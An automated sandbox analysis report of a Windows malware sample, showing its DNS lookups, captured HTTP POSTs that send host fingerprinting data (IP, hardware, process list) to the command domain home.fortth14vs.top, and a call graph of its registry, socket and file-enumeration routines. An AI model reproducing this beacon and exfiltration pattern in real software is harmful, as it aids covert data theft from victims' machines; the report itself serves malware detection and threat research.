                                    Dec 31, 2024 15:41:57.403340101 CET192.168.2.91.1.1.10x9200Standard query (0)httpbin.org28IN (0x0001)false
                                    Dec 31, 2024 15:41:59.217747927 CET192.168.2.91.1.1.10x6b57Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:41:59.217869997 CET192.168.2.91.1.1.10xc9e5Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                    Dec 31, 2024 15:42:02.672317028 CET192.168.2.91.1.1.10x2703Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:42:02.674532890 CET192.168.2.91.1.1.10xc3baStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                    Dec 31, 2024 15:42:03.838474035 CET192.168.2.91.1.1.10x2263Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:42:03.838521004 CET192.168.2.91.1.1.10xfeb3Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 31, 2024 15:41:57.410262108 CET1.1.1.1192.168.2.90xa13aNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:41:57.410262108 CET1.1.1.1192.168.2.90xa13aNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:41:59.729741096 CET1.1.1.1192.168.2.90x6b57No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:42:03.140379906 CET1.1.1.1192.168.2.90x2703No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:42:04.456136942 CET1.1.1.1192.168.2.90x2263No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:42:12.075968981 CET1.1.1.1192.168.2.90x60a2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                    Dec 31, 2024 15:42:12.075968981 CET1.1.1.1192.168.2.90x60a2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • httpbin.org
                                    • home.fortth14vs.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.94970634.147.147.173807132C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 31, 2024 15:41:59.750154018 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                    Host: home.fortth14vs.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 444098
                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 38 30 35 31 37 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206805172", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                                    Dec 31, 2024 15:41:59.755131960 CET2472OUTData Raw: 6c 30 56 52 63 2b 43 4a 64 41 6d 65 52 6d 47 6f 2b 45 76 46 50 69 53 44 55 45 5a 53 4e 73 65 33 78 62 66 38 41 6a 50 53 35 4c 62 67 2b 5a 48 5c 2f 5a 63 64 79 34 4a 43 58 73 4a 32 75 76 6c 5c 2f 69 50 39 6b 66 55 44 35 6b 5c 2f 67 48 78 78 6f 32
                                    Data Ascii: l0VRc+CJdAmeRmGo+EvFPiSDUEZSNse3xbf8AjPS5Lbg+ZH\/Zcdy4JCXsJ2uvl\/iP9kfUD5k\/gHxxo2ucSNFoni2D\/hDNZlfO6K3tNQkutU8IzKqZR77V\/EXhsSSKGWyjEgSPzck8ZOCs0ahiK+PyOU2vZ\/21hYUqMl1nPF4GvmGCw0ErNzxmJw6trryy5fez7wC8QsljKeGw+W8Rwpq9X\/V\/GVK1eL+zCngczwuV5h
                                    Dec 31, 2024 15:41:59.755189896 CET7416OUTData Raw: 2f 77 42 4b 67 66 70 2b 50 39 44 56 75 6f 32 62 73 50 78 50 2b 46 61 77 32 2b 66 36 49 37 4b 66 58 35 66 71 55 36 6a 6b 37 66 6a 5c 2f 41 45 71 64 2b 76 34 66 31 4e 4d 71 7a 51 72 31 48 49 50 76 76 2b 49 5c 2f 2b 76 56 6d 54 37 6a 66 53 6f 71 44
                                    Data Ascii: /wBKgfp+P9DVuo2bsPxP+Faw2+f6I7KfX5fqU6jk7fj\/AEqd+v4f1NMqzQr1HIPvv+I\/+vVmT7jfSoqDoK9V5P8AYTdj\/Perknb8f6VW+63fH9D\/AJ\/Sg6qXT\/D\/AJDOmz+Pp\/X\/AD+Pfuxvuv8AUfyWpt33\/wCD\/P8Anr06npTKDYpn\/ln+H9Kgfp+P9DV3Y3p\/L\/GoZFc7D9\/\/AD\/Pt7fjQXDf5fqimV
                                    Dec 31, 2024 15:41:59.755239964 CET2472OUTData Raw: 78 70 6c 57 4b 69 32 48 32 5c 2f 7a 2b 46 57 64 68 42 4a 32 5c 2f 48 2b 6c 51 64 33 2b 67 5c 2f 6c 56 70 6c 7a 77 65 43 4b 68 5a 63 63 48 6b 47 67 42 6a 5c 2f 64 50 34 66 7a 46 4d 66 72 2b 48 39 54 55 74 4e 5a 64 32 4f 32 4b 44 53 6e 31 2b 52 44
                                    Data Ascii: xplWKi2H2\/z+FWdhBJ2\/H+lQd3+g\/lVplzweCKhZccHkGgBj\/dP4fzFMfr+H9TUtNZd2O2KDSn1+RDUPP3Pf8Az+Hf9ampm359\/tj\/AD\/Og0Iqr1YooOgr0x+n4\/0NPpGBb880HQQfxbe\/6dcVFsPt\/n8Klf8A1h\/3R\/SigCvUfl+\/6f8A16sv0\/H+hqKg6qXT\/D\/kVX+6fw\/mKhb5c57elXPL9\/0\/+v
                                    Dec 31, 2024 15:41:59.755266905 CET2472OUTData Raw: 54 35 63 66 63 54 7a 63 66 39 4e 2b 33 2b 69 39 75 50 38 34 70 6b 6a 66 33 30 33 5c 2f 38 74 76 33 66 5c 2f 4c 48 5c 2f 41 50 58 55 2b 31 38 35 66 31 38 7a 6f 49 57 2b 36 2b 5c 2f 35 45 5c 2f 36 35 66 76 38 41 5c 2f 50 31 50 36 30 7a 7a 50 75 64
                                    Data Ascii: T5cfcTzcf9N+3+i9uP84pkjf303\/8tv3f\/LH\/APXU+185f18zoIW+6+\/5E\/65fv8A\/P1P60zzPudP+\/vX\/P8AI1Ptf7jn5\/N\/e+\/Hequ15FCfu9sn\/LPyvIPP688+3NUA+T92yZ8xHt8yxRyy46Dv1o8t2j+5vxF5sUfm\/v8A7OPbgf8A1\/0Dtj3o\/wDzy8r+uP8APNHzn7iSf63zbX0\/LP8AntQBW8tW\/
                                    Dec 31, 2024 15:41:59.755279064 CET2472OUTData Raw: 70 6c 31 44 65 57 72 79 57 32 6e 51 57 31 7a 44 35 30 44 4d 71 7a 32 74 7a 46 4e 62 33 64 75 35 57 61 32 75 49 35 62 65 65 4f 4f 61 4e 6b 48 54 65 4b 5c 2f 77 42 6d 72 77 46 38 56 62 32 34 31 6a 53 5c 2f 69 52 38 55 5c 2f 68 78 64 65 49 39 46 30
                                    Data Ascii: pl1DeWryW2nQW1zD50DMqz2tzFNb3du5Wa2uI5beeOOaNkHTeK\/wBmrwF8Vb241jS\/iR8U\/hxdeI9F0nS\/ivoHwj8dQeFNP+JVhaadDp0Fv47sH0vVL2y1NtLhGht4s8KXHhLxpd+HorXRpPEs2l6fpUFl\/wAsH0V80xPDXjN4q4jE4uvkWIpZHxLwzjHistxOLnhnnGbvB42hisFTrYLGUMRQpYbEPDv2sYrMaWGwmYYe
                                    Dec 31, 2024 15:41:59.755301952 CET2472OUTData Raw: 5c 2f 6e 5c 2f 41 42 71 4b 6a 6e 58 6e 5c 2f 58 7a 4f 67 72 30 56 4a 35 66 76 2b 6e 5c 2f 31 36 6a 71 7a 53 6e 31 2b 58 36 6b 5a 5c 2f 77 42 61 76 2b 36 61 6a 71 54 5c 2f 41 4a 61 66 35 5c 2f 75 31 48 51 61 42 55 63 6e 62 38 66 36 56 4a 52 51 42
                                    Data Ascii: \/n\/ABqKjnXn\/XzOgr0VJ5fv+n\/16jqzSn1+X6kZ\/wBav+6ajqT\/AJaf5\/u1HQaBUcnb8f6VJRQBXop79fw\/qaZQdBHJ2\/H+lVvvN3x\/Qf5\/WrtRyDv+BH+fxoNKfX5fqQbB7\/5\/CoqsVHJ2\/Gg0K\/l+\/wCn\/wBeo6sU1\/un8P5ig6KdTfT+u6\/rtqQ1Dg\/3f\/Qv8amoqORef9fI6CvTO6fQ\/wAqfR
                                    Dec 31, 2024 15:41:59.755323887 CET2472OUTData Raw: 77 44 39 56 51 79 4c 75 6b 32 62 39 36 63 79 78 66 75 6a 5c 2f 4f 6e 2b 5a 39 77 66 66 35 38 72 33 68 74 38 66 38 65 76 5c 2f 58 6a 5c 2f 41 44 34 36 31 7a 6e 51 45 66 38 41 72 50 4f 32 62 33 6b 5c 2f 35 64 5c 2f 4b 5c 2f 63 63 57 76 2b 66 70 52
                                    Data Ascii: wD9VQyLuk2b96cyxfuj\/On+Z9wff58r3ht8f8ev\/Xj\/AD461znQEf8ArPO2b3k\/5d\/K\/ccWv+fpR+52pvPNx\/yz58j+f+e\/FQtIVjR9n+fTp+Hf070eWnzr9yP\/AFXl+nT\/APX\/AI0GntPL8f8AgA2z5HeHen\/TQ9P+nr171W+79x\/n\/wCen\/PH\/wCv\/nnvZ+7H8iY4x+\/5\/wBH\/wA9uv400qVV38np
                                    Dec 31, 2024 15:41:59.755350113 CET2472OUTData Raw: 37 50 72 5a 50 68 4b 46 61 6a 48 42 56 4b 4e 46 56 5a 55 49 71 47 47 68 68 4b 64 4c 44 30 33 53 6a 56 6c 54 6e 37 44 44 7a 72 34 53 68 55 6c 54 71 34 76 43 30 36 76 35 48 6d 5c 2f 68 62 34 6f 55 63 67 6f 63 65 35 31 77 5c 2f 6e 45 73 6b 7a 79 6a
                                    Data Ascii: 7PrZPhKFajHBVKNFVZUIqGGhhKdLD03SjVlTn7DDzr4ShUlTq4vC06v5Hm\/hb4oUcgoce51w\/nEskzyj\/AGnRz\/G4nD4mWYwr4meHjiJueLq42riMViKOKdCFan9ZxcMFmOIowq0cux9Wh6HJYzKPlTen0+uepHb61CYnU4ZSv1FT2eo2t1GJtPura6hOMS2s8VxGfTEkTMpyPfp7VqW91YyXVja6zrWi+HrC6vIbW78R+I
                                    Dec 31, 2024 15:41:59.760042906 CET2472OUTData Raw: 30 43 35 75 72 72 51 50 45 4e 6e 6f 64 7a 63 51 44 58 64 42 75 72 2b 77 30 75 2b 6d 30 58 56 6f 72 66 37 64 70 63 31 5c 2f 70 6d 6e 33 6a 32 55 30 4c 33 56 6a 61 54 46 34 49 2b 31 38 53 36 56 70 48 68 7a 77 78 72 47 74 4a 38 56 50 67 35 34 69 38
                                    Data Ascii: 0C5urrQPENnodzcQDXdBur+w0u+m0XVorf7dpc1\/pmn3j2U0L3VjaTF4I+18S6VpHhzwxrGtJ8VPg54i8T+Fvgl8J\/wBozxp8JfD+s\/ExPid4P+DPxkm8C23hTxpqa+JvhH4Z+Gur29rdfEnwXb+IdN8HfEzxRq+j\/wBtxXL2M1hbX93ae5m\/iFwZkGHyPFZzxBg8uw\/Ekqcckq4iOIjHHe1orERnG1FujSjQftqtXEqj
                                    Dec 31, 2024 15:41:59.760099888 CET2472OUTData Raw: 6b 4b 6d 6f 6f 41 72 30 55 5c 2f 59 66 62 5c 2f 41 44 2b 46 4e 4b 6c 66 5c 2f 72 55 48 51 4a 56 65 72 46 51 6e 71 5c 2f 34 5c 2f 2b 68 43 67 30 70 39 66 6c 2b 6f 32 71 39 57 4b 4b 44 51 71 62 66 6d 7a 32 36 5c 2f 6a 5c 2f 6e 6e 39 4b 69 71 33 49
                                    Data Ascii: kKmooAr0U\/Yfb\/AD+FNKlf\/rUHQJVerFQnq\/4\/+hCg0p9fl+o2q9WKKDQqbfmz26\/j\/nn9Kiq3Iv3Pbn644plB0FV\/un8P5ioatbG9P5f40bG9P5f40F878v6+ZQw\/v+f\/ANel8v3\/AE\/+vViRX7D6f4+\/t1\/nUdBqV6Klfp+P9DTOUPbkf59KDT2nl+P\/AACB+v4UyrFRbD7f5\/Cg7CpTH6fj\/Q1P5T+n
                                    Dec 31, 2024 15:42:02.480638027 CET138INHTTP/1.1 200 OK
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:02 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 1
                                    Data Raw: 30
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.94970734.147.147.173807132C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 31, 2024 15:42:03.147456884 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                    Host: home.fortth14vs.top
                                    Accept: */*
                                    Dec 31, 2024 15:42:03.782170057 CET353INHTTP/1.1 404 NOT FOUND
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:03 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 207
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.94970834.147.147.173807132C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 31, 2024 15:42:04.584219933 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                    Host: home.fortth14vs.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                    Dec 31, 2024 15:42:05.292166948 CET353INHTTP/1.1 404 NOT FOUND
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:05 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 207
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.94970534.200.57.1144437132C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-31 14:41:58 UTC52OUTGET /ip HTTP/1.1
                                    Host: httpbin.org
                                    Accept: */*
                                    2024-12-31 14:41:58 UTC224INHTTP/1.1 200 OK
                                    Date: Tue, 31 Dec 2024 14:41:58 GMT
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Connection: close
                                    Server: gunicorn/19.9.0
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
                                    2024-12-31 14:41:58 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                    Data Ascii: { "origin": "8.46.123.189"}


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:41:53
                                    Start date:31/12/2024
                                    Path:C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Bo6uO5gKL4.exe"
                                    Imagebase:0x580000
                                    File size:4'494'336 bytes
                                    MD5 hash:935D1FE58326C50F930C94E3493B266C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:19%
                                      Total number of Nodes:459
                                      Total number of Limit Nodes:72
                                      execution_graph 58212 591139 58213 591148 58212->58213 58214 591512 58213->58214 58215 591161 58213->58215 58222 590f00 58214->58222 58225 5922d0 _open 58214->58225 58215->58222 58224 590150 _open 58215->58224 58219 590150 _open 58219->58222 58220 5875a0 _open 58220->58222 58221 590f7b 58222->58219 58222->58220 58222->58221 58226 5bd4d0 _open 58222->58226 58227 594940 _open 58222->58227 58224->58222 58225->58222 58226->58222 58227->58222 57704 634720 57708 634728 57704->57708 57705 634733 57707 634774 57708->57705 57713 63476c 57708->57713 57714 639270 57708->57714 57710 634860 57717 634950 57710->57717 57712 634878 57713->57712 57721 6330a0 closesocket 57713->57721 57722 63a440 57714->57722 57716 639297 57716->57710 57719 634966 57717->57719 57718 634aa0 gethostname 57718->57719 57720 6349c5 57718->57720 57719->57718 57719->57720 57720->57713 57721->57707 57748 63a46b 57722->57748 57723 63aa03 RegOpenKeyExA 57724 63ab70 RegOpenKeyExA 57723->57724 57725 63aa27 RegQueryValueExA 57723->57725 57726 63ac34 RegOpenKeyExA 57724->57726 57745 63ab90 57724->57745 57727 63aa71 57725->57727 57728 63aacc RegQueryValueExA 57725->57728 57729 63acf8 RegOpenKeyExA 57726->57729 57747 63ac54 57726->57747 57727->57728 57733 63aa85 RegQueryValueExA 57727->57733 57730 63ab66 RegCloseKey 57728->57730 57731 63ab0e 57728->57731 57732 63ad56 RegEnumKeyExA 57729->57732 57735 63ad14 57729->57735 57730->57724 57731->57730 57738 63ab1e RegQueryValueExA 57731->57738 57734 63ad9b 57732->57734 57732->57735 57737 63aab3 57733->57737 57736 63ae16 RegOpenKeyExA 57734->57736 57735->57716 57739 63ae34 RegQueryValueExA 57736->57739 57740 63addf RegEnumKeyExA 57736->57740 57737->57728 57741 63ab4c 57738->57741 57742 63af43 RegQueryValueExA 57739->57742 57749 63adaa 57739->57749 57740->57735 57740->57736 57741->57730 57743 63b052 RegQueryValueExA 57742->57743 57742->57749 57744 63adc7 RegCloseKey 57743->57744 57743->57749 57744->57740 57745->57726 57746 63afa0 RegQueryValueExA 57746->57749 57747->57729 57748->57723 57748->57735 57749->57742 57749->57743 57749->57744 57749->57746 57750 6370a0 57754 6370ae 57750->57754 57752 6371a7 57753 63717f 57753->57752 57762 649320 closesocket 57753->57762 57754->57752 57754->57753 57757 64a8c0 57754->57757 57761 6371c0 socket ioctlsocket connect getsockname 57754->57761 57758 64a8e6 57757->57758 57759 64a903 recvfrom 57757->57759 57758->57759 57760 64a8ed 57758->57760 57759->57760 57760->57754 57761->57754 57762->57752 57763 64a920 57764 64a944 57763->57764 57765 64a94b 57764->57765 57766 64a977 send 57764->57766 58228 64b180 58229 64b19b 58228->58229 58235 64b2e3 58228->58235 58232 64b2a9 getsockname 58229->58232 58234 64b020 closesocket 58229->58234 58229->58235 58236 64af30 58229->58236 58240 64b060 58229->58240 58245 64b020 58232->58245 58234->58229 58237 64af63 socket 58236->58237 58238 64af4c 58236->58238 58237->58229 58238->58237 58239 64af52 58238->58239 58239->58229 58244 64b080 58240->58244 58241 64b0b0 connect 58242 64b0bf WSAGetLastError 58241->58242 58243 64b0ea 58242->58243 58242->58244 58243->58229 58244->58241 58244->58242 58244->58243 58246 64b052 58245->58246 58247 64b029 58245->58247 58246->58229 58248 64b04b closesocket 58247->58248 58249 64b03e 58247->58249 58248->58246 58249->58229 58250 64a080 58253 649740 58250->58253 58252 64a09b 58254 649780 58253->58254 58258 64975d 58253->58258 58255 649925 RegOpenKeyExA 58254->58255 58254->58258 58256 64995a RegQueryValueExA 58255->58256 58255->58258 58257 649986 RegCloseKey 58256->58257 58257->58258 58258->58252 57767 58255d 57768 909f70 57767->57768 57769 58256c GetSystemInfo 57768->57769 57770 582589 57769->57770 57771 5825a0 GlobalMemoryStatusEx 57770->57771 57778 5825ec 57771->57778 57772 58263c GetDriveTypeA 57774 582655 GetDiskFreeSpaceExA 57772->57774 57772->57778 57773 582762 57775 5827d6 KiUserCallbackDispatcher 57773->57775 57774->57778 57776 5827f8 57775->57776 57777 582842 SHGetKnownFolderPath 57776->57777 57779 5828c3 57777->57779 57778->57772 57778->57773 57780 5828d9 FindFirstFileW 57779->57780 57781 582906 FindNextFileW 57780->57781 57782 582928 57780->57782 57781->57781 57781->57782 57783 a57460 57784 a57492 57783->57784 57785 a5749e 57784->57785 57788 908f70 57784->57788 57787 a574a7 57795 908e90 _open 57788->57795 57790 908f82 57791 908e90 _open 57790->57791 57792 908fa2 57791->57792 57793 908f70 _open 57792->57793 57794 908fb8 57793->57794 57794->57787 57796 908eba 57795->57796 57796->57790 57797 583d5e 57800 583d30 57797->57800 57799 583d90 57800->57797 57800->57799 57801 590ab0 57800->57801 57804 5905b0 57801->57804 57805 5905bd 57804->57805 57808 5907c7 57804->57808 57805->57808 57811 59066a 57805->57811 57817 5907ce 57805->57817 57825 5903c0 _open 57805->57825 57826 597450 _open 57805->57826 57808->57800 57815 5906f0 57811->57815 57811->57817 57827 5973b0 _open 57811->57827 57812 590707 WSAEventSelect 57812->57815 57812->57817 57813 5907ef 57813->57817 57820 590847 57813->57820 57821 596fa0 57813->57821 57815->57812 57815->57813 57828 5876a0 57815->57828 57839 597380 _open 57817->57839 57818 5909e8 WSAEnumNetworkEvents 57819 5909d0 WSAEventSelect 57818->57819 57818->57820 57819->57818 57819->57820 57820->57817 57820->57818 57820->57819 57822 596fd4 57821->57822 57824 596feb 57821->57824 57823 597207 select 57822->57823 57822->57824 57823->57824 57824->57820 57825->57805 57826->57805 57827->57811 57829 5876c0 57828->57829 57830 5876e6 send 57828->57830 57829->57830 57831 5876c9 57829->57831 57832 5876d3 57830->57832 57838 587704 57830->57838 57831->57832 57833 58770b 57831->57833 57840 5872a0 _open 57832->57840 57841 5872a0 _open 57833->57841 57836 58771c 57842 58cb20 _open 57836->57842 57838->57815 57839->57808 57840->57838 57841->57836 57842->57838 58259 5829ff FindFirstFileA 58260 582a31 58259->58260 58261 582a5c RegOpenKeyExA 58260->58261 58262 582a93 58261->58262 58263 582ade CharUpperA 58262->58263 58265 582b0a 58263->58265 58264 582bf9 QueryFullProcessImageNameA 58266 582c3b CloseHandle 58264->58266 58265->58264 58267 582c64 58266->58267 58268 582df1 CloseHandle 58267->58268 58269 582e23 58268->58269 57843 5b8b50 57844 5b8b6b 57843->57844 57845 5b8be6 57843->57845 57844->57845 57846 5b8b8f 57844->57846 57847 5b8bf3 57844->57847 57945 596e40 select 57846->57945 57876 5ba550 57847->57876 57851 5b8ba1 57852 5b8cd9 SleepEx getsockopt 57851->57852 57860 5b8bb5 57851->57860 57874 5b8cb2 57851->57874 57856 5b8d18 57852->57856 57853 5ba150 2 API calls 57865 5b8dff 57853->57865 57854 5b8c1f connect 57855 5b8c35 57854->57855 57933 5ba150 57855->57933 57857 5b8d43 57856->57857 57856->57874 57864 5ba150 2 API calls 57857->57864 57858 5b8eae 57858->57845 57952 5878b0 closesocket 57858->57952 57859 5b8e85 57859->57845 57859->57858 57951 592a00 _open 57859->57951 57860->57845 57947 5c50a0 _open 57860->57947 57864->57860 57865->57859 57949 59d090 _open 57865->57949 57866 5b8c8b 57866->57851 57869 5b8dc8 57866->57869 57948 5bb100 _open 57869->57948 57870 5b8e67 57950 5c4fd0 _open 57870->57950 57874->57845 57874->57853 57874->57859 57877 5ba575 57876->57877 57879 5ba597 57877->57879 57956 5875e0 57877->57956 57925 5ba6d9 57879->57925 57968 5bef30 57879->57968 57880 5ba709 57884 5878b0 2 API calls 57880->57884 57905 5ba713 57880->57905 57882 5b8bfc 57882->57845 57882->57854 57882->57855 57882->57874 57884->57905 57885 5ba63a 57888 5ba641 57885->57888 57891 5ba69b 57885->57891 57886 5ba7e5 57890 5ba811 setsockopt 57886->57890 57893 5ba87c 57886->57893 57906 5ba8ee 57886->57906 57888->57886 57977 5c4fd0 _open 57888->57977 57890->57893 57898 5ba83b 57890->57898 57973 59d090 _open 57891->57973 57893->57906 57980 5bb1e0 _open 57893->57980 57894 5ba6c9 57974 5c4f40 _open 57894->57974 57898->57893 57978 59d090 _open 57898->57978 57899 5baf56 57901 5baf5d 57899->57901 57899->57925 57904 5ba150 2 API calls 57901->57904 57901->57905 57902 5ba86d 57979 5c4fd0 _open 57902->57979 57904->57905 57905->57882 57976 5c50a0 _open 57905->57976 57907 5bacb8 57906->57907 57908 5bae32 57906->57908 57910 5babb9 57906->57910 57916 5baf33 57906->57916 57906->57925 57926 5babe1 57906->57926 57907->57910 57917 5bacdc 57907->57917 57907->57925 57908->57910 57987 5c4fd0 _open 57908->57987 57909 5bb056 57990 59d090 _open 57909->57990 57913 5bad45 57910->57913 57915 5bade6 57910->57915 57910->57926 57982 5b6be0 select closesocket _open 57910->57982 57911 5baf03 57911->57916 57988 5c4fd0 _open 57911->57988 57913->57915 57927 5bad5f 57913->57927 57985 59d090 _open 57915->57985 57972 5e67e0 ioctlsocket 57916->57972 57981 59d090 _open 57917->57981 57920 5bb07b 57991 5c4f40 _open 57920->57991 57925->57880 57925->57905 57975 592a00 _open 57925->57975 